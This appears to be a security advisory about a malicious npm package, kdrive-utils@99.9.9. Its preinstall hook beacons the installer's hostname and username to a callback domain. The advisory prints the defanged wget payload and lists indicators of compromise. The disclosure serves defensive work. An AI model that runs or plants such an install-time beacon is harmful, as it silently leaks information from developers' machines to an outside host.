LWA-2026-5857 MAL-2026-6295 ↗ confirmed malware

kdrive-utils@99.9.9

Malicious code in kdrive-utils (npm)

T1059.007 · JavaScriptT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel

Analysis

The preinstall lifecycle hook (runs automatically during npm install) silently sends the installer's hostname and username via HTTP GET to an out-of-band callback domain d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live. The payload is: wget -q -O- "hxxp://d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live/$(hostname)/$(whoami)". The package contains no functional code beyond this recon beacon. IOCs: oast[.]live (domain), d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live, the full exfiltration path /$(hostname)/$(whoami).

analyzed by
Leitwacht
first seen
Jun 23, 2026, 03:10 AM
analyzed
Jun 23, 2026, 03:10 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.